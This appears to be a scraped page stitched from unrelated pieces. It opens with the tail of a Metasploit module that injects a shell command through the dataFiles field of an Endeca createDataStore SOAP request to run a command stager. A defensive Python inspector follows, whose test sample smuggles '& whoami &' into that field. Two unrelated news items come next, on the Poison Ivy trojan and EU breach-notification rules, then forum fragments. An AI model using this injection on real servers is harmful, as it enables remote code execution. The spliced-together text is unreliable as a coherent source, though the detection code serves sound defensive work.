        injection = "c:\\"& #{cmd} &""
        exploit_data = create_data_store_soap(rand_text_alpha(4), injection)
        begin
            res = send_request_soap(exploit_data)
            if res.nil? or res.code != 500 or ( res.body !~ /Error creating data files at/ and res.body !~ /Data files don't exist/ )
                print_status("#{res.code}\n#{res.body}") if res
                fail_with(Failure::UnexpectedReply, "#{peer} - Unable to execute the CMD Stager")
            end
        rescue ::Rex::ConnectionError
            fail_with(Failure::Unreachable, "#{peer} - Unable to connect")
        end
    end

end
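Added here as a defender-side example, not part of the original post or of the Metasploit module: the inspector below parses a createDataStore SOAP request of the shape the module sends, lets the XML parser decode the entities (the module relies on entity encoding of `&` to get its payload through the SOAP layer, so a filter that looks at the raw body before decoding misses it), and flags a dataFiles value that contains cmd.exe metacharacters or is not a plain absolute Windows path. The namespace URIs and element names come from the module; both sample requests are constructed, and the metacharacter set and path pattern are assumptions to tune per deployment.

```python
import re
import xml.etree.ElementTree as ET
from typing import Dict, List

# Namespaces exactly as used in the module's SOAP envelopes.
SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
ENDECA_NS = "http://www.endeca.com/endeca-server/control/1/0"

# Characters that cmd.exe treats specially but that never belong in a
# data-files directory path (assumed list, tune per deployment).
SHELL_META = re.compile(r'[&|<>^"%;`\n\r]')
# A plain absolute Windows path: drive letter, colon, backslash, then no
# reserved or shell-significant characters (assumed pattern).
WIN_PATH = re.compile(r'^[A-Za-z]:\\[^<>:"|?*&^%;`\r\n]*$')


def audit_create_data_store(soap_xml: str) -> Dict[str, object]:
    """Inspect one SOAP request; returns the decoded fields and any findings."""
    root = ET.fromstring(soap_xml)          # entity decoding happens here
    body = root.find("{%s}Body" % SOAP_NS)
    if body is None:
        raise ValueError("no SOAP Body element")
    req = body.find("{%s}createDataStore" % ENDECA_NS)
    if req is None:
        # Some other operation (e.g. ns:version); nothing to check here.
        return {"operation": None, "name": "", "dataFiles": "", "findings": []}
    cfg = req.find("{%s}dataStoreConfig" % ENDECA_NS)
    name = cfg.findtext("{%s}name" % ENDECA_NS, default="") if cfg is not None else ""
    files = cfg.findtext("{%s}dataFiles" % ENDECA_NS, default="") if cfg is not None else ""

    findings: List[str] = []
    metas = sorted(set(SHELL_META.findall(files)))
    if metas:
        findings.append("shell metacharacters in dataFiles: " + " ".join(repr(c) for c in metas))
    if files and not WIN_PATH.match(files):
        findings.append("dataFiles is not a plain absolute Windows path")
    return {"operation": "createDataStore", "name": name, "dataFiles": files, "findings": findings}


def _envelope(body: str) -> str:
    return ('<soapenv:Envelope xmlns:soapenv="%s" xmlns:ns="%s">'
            '<soapenv:Header/><soapenv:Body>%s</soapenv:Body></soapenv:Envelope>'
            % (SOAP_NS, ENDECA_NS, body))


# Constructed sample requests (not captured traffic).
VERSION_REQUEST = _envelope("<ns:version/>")
BENIGN_REQUEST = _envelope(
    "<ns:createDataStore><ns:dataStoreConfig>"
    "<ns:name>sales</ns:name>"
    "<ns:dataFiles>C:\\Endeca\\data\\sales</ns:dataFiles>"
    "</ns:dataStoreConfig></ns:createDataStore>")
# Same shape as the module's injection: the quote and ampersands arrive
# entity-encoded and only become cmd.exe syntax after XML decoding.
SUSPICIOUS_REQUEST = _envelope(
    "<ns:createDataStore><ns:dataStoreConfig>"
    "<ns:name>abcd</ns:name>"
    "<ns:dataFiles>c:\\&quot;&amp; whoami &amp;&quot;</ns:dataFiles>"
    "</ns:dataStoreConfig></ns:createDataStore>")


if __name__ == "__main__":
    for label, req in (("version", VERSION_REQUEST), ("benign", BENIGN_REQUEST),
                       ("suspicious", SUSPICIOUS_REQUEST)):
        result = audit_create_data_store(req)
        print(label, result["operation"], result["dataFiles"], result["findings"])
```

Running the inspector on the decoded value rather than on the raw body is the whole point: the raw SUSPICIOUS_REQUEST contains no literal `&` or `"` in the element text, so a substring rule on the wire bytes would never fire.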
-
Security firm FireEye has discovered that the popular Poison Ivy trojan, which was used to attack the RSA SecurID infrastructure in 2011, is still going strong after eight years and continues to be used in targeted attacks. FireEye announced this in a report titled "Poison Ivy: Assessing Damage and Extracting Intelligence", stating that the remote access tool (RAT) is not blocked and continues to be a favourite of some hackers. "Dismissing this common category of malware could be a costly mistake," explained Darien Kindlund, threat intelligence manager at FireEye, in a blog post. "Despite its reputation as software for novice attackers, RATs continue to be a component of many sophisticated cyber attacks and are used by numerous attackers." Kindlund said that FireEye identifies hundreds of attacks using Poison Ivy, aimed at major companies, which is worrying because it has been used in several high-profile malware campaigns, the best known being the 2011 one that compromised RSA SecurID data. In the same year, Poison Ivy powered an attack dubbed "Nitro" against chemical manufacturers, government offices, defence firms and human rights groups. The FireEye report also presents information on the nation-state threat actors taking advantage of Poison Ivy, among them "admin@338", which targets the financial services industry; "th3bug", which targets higher education and the healthcare industry; and "menuPass", which targets US and overseas defence contractors. The security firm has released a toolkit, called Calamine, to help organisations detect possible Poison Ivy infections.
"With the Calamine package, security professionals can identify indicators of a possible Poison Ivy attack," FireEye said. "Calamine may not stop attackers using Poison Ivy, but it can make their efforts much harder." Source : THE INQUIRER - News, reviews and opinion for tech buffs
-
European Union regulations designed to force telecom operators and internet service providers (ISPs) to notify national authorities within 24 hours of detecting a data breach are set to take effect on 25 August, despite widespread criticism from numerous UK government bodies. The laws mean that the companies will have to report any cyber incidents resulting in theft or unauthorised access to customer data to the relevant law enforcement agency within just one day. ISPs and telecoms firms have already been subject to this law, but the 24-hour notification regime is new, as European Commission (EC) vice president Neelie Kroes looks to strengthen the data protection regime in Europe. However, the wider reforms for data breach disclosure, which could see the same burdens on ISPs and telecoms firms placed on all industries, have been widely criticised by groups in both the private and public sector. Experts from numerous security firms, including Trend Micro and F-Secure, argue that while they are well intentioned there is no realistic way to police the laws fairly or safely. They also warned that by forcing companies to disclose attack data so quickly, businesses will not have time to do adequate cyber forensics work, meaning that to act within the law they will have to take ill-conceived, knee-jerk actions in reaction to attacks - a practice that security firms like Detica have warned against for some time. The laws come as future European data protection laws undergo fierce debate. The legislation has attracted the ire of UK Justice Minister Lord McNally, who has criticised the European Commission's data protection draft, warning that the overarching legislation will cause untold damage to the British economy. Lord McNally said that the unrealistic time frame of the proposal will force many smaller businesses to operate outside the law, risking potentially devastating fines.
The calls for change have met with some success, with recent reports suggesting that the European Parliament is deadlocked on whether to rethink the 24-hour disclosure time frame. The vote to decide whether the law should remain the same is scheduled to take place in October, with amended legislation hoped for before the European elections in May 2014. Source : V3.CO.UK
-
It only shows whom we give it to. Not who gives it to us.
-
The name of the person who gives you positive or negative reputation.